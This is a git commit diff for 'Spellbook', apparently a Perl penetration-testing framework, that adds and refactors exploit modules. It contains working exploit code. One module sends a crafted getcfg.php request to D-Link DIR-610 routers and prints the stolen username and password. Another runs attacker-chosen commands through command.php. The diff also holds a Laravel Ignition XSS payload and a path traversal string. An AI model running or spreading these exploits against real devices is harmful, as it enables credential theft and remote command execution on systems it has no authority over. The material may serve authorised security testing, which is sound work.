A lot of updates (#90)

* fix name of the module

* note

* disable max redirect

* upload the exploit

* upload the exploit

* better description

* improving parameters description

* fix response format

* next severity

* fix linter findings

* improvings on the exploit

* fix name of the module

* remove desnecessary module

* remove duplicate description

* remove deuplicate module

* next severity level

* move analysis to just consider https urls

* add filter to remove /original/ in the responses

* added note

* added note

* improve the quality of inputs and also output format

* update version

* just a draft

* reduce one line

* add Laravel_Ignition_XSS.pm

* update version

---------

Co-authored-by: Heitor Gouvêa <[email protected]>

.config/modules.json

@@ -208,7 +208,7 @@
             "id": "0035",
             "category": "parser",
             "module": "S3_Bucket",
-            "description": "Extract the path of files from a S3 Bucket with object listing"
+            "description": "Extract the path of files from a resource with object listing"
         },
         {
             "id": "0036",
@@ -298,7 +298,7 @@
             "id": "0050",
             "category": "exploit",
             "module": "S3_Bucket_Takeover",
-            "description": "Detection possible of takeover on AWS S3 Bucket resource"
+            "description": "Detection possible of takeover on resource"
         },
         {  
             "id": "0051",
@@ -329,6 +329,30 @@
             "category": "advisory",
             "module": "CVE_2021_41174",
             "description": "Exploit for XSS vulnerability on grafana"
+        },
+        {
+            "id": "0056",
+            "category": "advisory",
+            "module": "CVE_2020_9376",
+            "description": "Exploit for dump credentials of router DLINK 610"
+        },
+        {
+            "id": "0056",
+            "category": "advisory",
+            "module": "CVE_2020_9377",
+            "description": "Exploit auth RCE vulnerability at router DLINK-610"
+        },
+        {
+            "id": "0057",
+            "category": "advisory",
+            "module": "Laravel_Ignition_XSS",
+            "description": "Laravel Ignition contains a cross-site scripting vulnerability when debug mode is enabled"
+        },
+        {
+            "id": "0058",
+            "category": "recon",
+            "module": "Shodan",
+            "description": ""
         }
     ]
 }

.perlcriticrc

@@ -1,3 +1,4 @@
-severity = 5
+severity = 3
 
-[-TestingAndDebugging::RequireUseStrict]
+[-TestingAndDebugging::RequireUseStrict]
+[-TestingAndDebugging::RequireUseWarnings]

lib/Spellbook/Advisory/CVE_2006_3392.pm

@@ -20,10 +20,8 @@ package Spellbook::Advisory::CVE_2006_3392 {
             }
 
             my $userAgent = Spellbook::Core::UserAgent -> new();
-
             my $temp      = "/..%01" x 40;
-            my $target    = $target . "/unauthenticated/" . $temp . $file;
-            my $request   = $userAgent -> get($target);
+            my $request   = $userAgent -> get($target . "/unauthenticated/" . $temp . $file);
 
             return $request -> content(); 
         } 

lib/Spellbook/Advisory/CVE_2020_9376.pm

@@ -1,23 +1,48 @@
 package Spellbook::Advisory::CVE_2020_9376 {
     use strict;
     use warnings;
-    use Mojo::UserAgent;
-
+    use Mojo::DOM;
+    use Spellbook::Core::UserAgent;
+
     sub new {
-        my $target = $ARGV[0];
-        my $port   = $ARGV[1];
-
-        if (($target) && ($port)) {
-            my $endpoint = "http://$target:$port/getcfg.php";
-            my $payload  = "SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1";
-
-            my $ua  = Mojo::UserAgent -> new(
-                Content-Type: application/x-www-form-urlencoded
-            );
-            my $request = $ua -> post ($endpoint => $payload) -> result();
-            my $response = $request -> body();
-
-            print $response;
+        my ($self, $parameters) = @_;
+        my ($help, $target, @results);
+
+        Getopt::Long::GetOptionsFromArray (
+            $parameters,
+            "h|help"     => \$help,
+            "t|target=s" => \$target
+        );
+
+        if ($target) {
+            if ($target !~ /^http(s)?:\/\//) {
+                $target = "http://$target";
+            }
+
+            my $userAgent = Spellbook::Core::UserAgent -> new();
+            my $headers   = HTTP::Headers -> new ("Content-Type" => "application/x-www-form-urlencoded");
+            my $payload   = "SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1";
+            my $request   = HTTP::Request -> new("POST", "$target/getcfg.php", $headers, $payload);
+            my $response  = $userAgent -> request($request);
+
+            if (($response -> code() == 200) && ($response -> content() =~ m/DIR-610/)) {
+                my $dom = Mojo::DOM -> new($response -> content());
+
+                my $name = $dom -> at("entry > name") -> text();
+                my $password = $dom -> at("entry > password") -> text();
+
+                print "$name:$password\n"; 
+            }
+
+            return @results;
+        }
+
+        if ($help) {
+            return "
+                \rAdvisory::CVE_2020_9376
+                \r=======================
+                \r-h, --help     See this menu
+                \r-t, --target   Define a target to exploit\n\n";
         }
 
         return 0;

lib/Spellbook/Advisory/CVE_2020_9377.pm

@@ -1,26 +1,51 @@
 package Spellbook::Advisory::CVE_2020_9377 {
     use strict;
     use warnings;
-    use Mojo::UserAgent;
-
+    use Spellbook::Core::UserAgent;
+    
     sub new {
-        my $target = $ARGV[0];
-        my $port   = $ARGV[1];
+        my ($self, $parameters) = @_;
+        my ($help, $target, $cookie, $command, @results);
 
-        if (($target) && ($port)) {
-            my $endpoint = "http://$target:$port/command.php";
-
-            my $payload  = {
-                Cookie => "",
-                cmd => "ls"
-            };
+        Getopt::Long::GetOptionsFromArray (
+            $parameters,
+            "h|help"     => \$help,
+            "t|target=s" => \$target,
+            "c|cookie=s" => \$cookie,
+            "p|payload=s" => \$command
+        );
 
-            # my $payload  = "SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1";
-
-            my $ua = Mojo::UserAgent -> new ();
-            my $response = $ua -> post ($endpoint, $payload);
+        if ($target) {
+            if ($target !~ /^http(s)?:\/\//) {
+                $target = "http://$target";
+            }
+
+            my $userAgent = Spellbook::Core::UserAgent -> new();
+            my $payload   = "cmd=$command";
 
-            print $response -> content();
+            my $headers   = HTTP::Headers -> new (
+                "Content-Type" => "application/x-www-form-urlencoded",
+                "Cookie" => "uid=$cookie"
+            );
+
+            my $request   = HTTP::Request -> new("POST", "$target/command.php", $headers, $payload);
+            my $response  = $userAgent -> request($request);
+
+            if ($response -> code() == 200) {
+                push @results, $response -> content();
+            }
+
+            return @results;
+        }
+
+        if ($help) {
+            return "
+                \rAdvisory::CVE_2020_9377
+                \r=======================
+                \r-h, --help     See this menu
+                \r-t, --target   Define a target
+                \r-c, --cokie    Define a session cookie
+                \r-p, --payload  Set the command to run on the target\n\n";
         }
 
         return 0;

lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm

@@ -0,0 +1,50 @@
+package Spellbook::Advisory::Laravel_Ignition_XSS {
+    use strict;
+    use warnings;
+    use Spellbook::Core::UserAgent;
+    use Spellbook::Helper::Generate_UUID;
+
+    sub new {
+        my ($self, $parameters) = @_;
+        my ($help, $target, @results);
+
+        Getopt::Long::GetOptionsFromArray (
+            $parameters,
+            "h|help"     => \$help,
+            "t|target=s" => \$target
+        );
+
+        if ($target) {
+            if ($target !~ /^http(s)?:\/\//) {
+                $target = "https://$target";
+            }
+
+            my @uuid      = Spellbook::Helper::Generate_UUID -> new(["--version" => 4, "--repeat" => 1]);
+            my $payload   = "$target/_ignition/scripts/--%3E%3Csvg%20onload=alert%28$uuid[0]%29%3E";
+            my $userAgent = Spellbook::Core::UserAgent -> new();
+            my $request   = $userAgent -> get($payload);
+
+            if (
+                $request -> code() == 500 &&
+                $request -> content() =~ m/Undefined index:/ &&
+                $request -> content() =~ m/$uuid[0]/
+            ) {
+                push @results, $target;
+            }
+
+            return @results;
+        }
+
+        if ($help) {
+            return "
+                \rAdvisory::CVE_
+                \r=======================
+                \r-h, --help     See this menu
+                \r-t, --target   Define a target\n\n";
+        }
+
+        return 0;
+    }
+}
+
+1;

lib/Spellbook/Android/Strings.pm

@@ -17,6 +17,15 @@ package Spellbook::Android::Strings {
             #     return "true";
             # }
         }
+
+        if ($help) {
+            return "
+            \rAndroid::
+            \r================
+            \r-h, --help       See this menu\n";
+        }
+
+        return 0;
     }
 }
 

lib/Spellbook/Core/Helper.pm

@@ -4,7 +4,7 @@ package Spellbook::Core::Helper {
 
 	sub new {
 		print "
-			\rSpellbook v0.3.2
+			\rSpellbook v0.3.4
 			\rCore Commands
 			\r==============
 			\r\tCommand          Description

lib/Spellbook/Core/Search.pm

@@ -3,7 +3,7 @@ package Spellbook::Core::Search {
     use warnings;
 
     sub new {
-        my ($self, $search) = @_;
+        my ($self, $search, @results) = @_;
 
         my $resources = Spellbook::Core::Resources -> new();
 
@@ -18,6 +18,8 @@ package Spellbook::Core::Search {
                 }
             }
         }
+
+        return @results;
     }
 }
 

lib/Spellbook/Core/UserAgent.pm

@@ -10,11 +10,11 @@ package Spellbook::Core::UserAgent {
                 verify_hostname => 0,
                 SSL_verify_mode => 0
             },
-            agent => "Spellbook / v0.3.3"
+            agent => "Spellbook / v0.3.4"
         );
 
         $userAgent -> default_headers -> push_header("Cache-Control" => "no-cache");
-        $userAgent -> max_redirect(0);
+        # $userAgent -> max_redirect(0);
 
         return $userAgent;
     }

lib/Spellbook/Exploit/Error_Handling.pm

@@ -1,13 +1,14 @@
 package Spellbook::Exploit::Error_Handling {
     use strict;
     use warnings;
-
+    use Spellbook::Core::UserAgent;
+
     sub new {
         my ($self, $parameters) = @_;
 
         # detect erros on web pages
         # “SQL syntax error''
-
+        # path disclosure
 
         return 1;
     }

lib/Spellbook/Exploit/Mixed_Content.pm

@@ -14,10 +14,14 @@ package Spellbook::Exploit::Mixed_Content {
         );
 
         if ($target) {
-            if ($target !~ /^http(s)?:\/\//) { 
-                $target = "https://$target";
+            if ($target =~ /^http:\/\//) {
+                $target =~ s/^http:\/\///; 
             }
 
+            if ($target !~ /^http(s)?:\/\//) {
+                $target = "https://$target";
+            }
+
             my $userAgent = Spellbook::Core::UserAgent -> new ();
             my $request   = $userAgent -> get($target);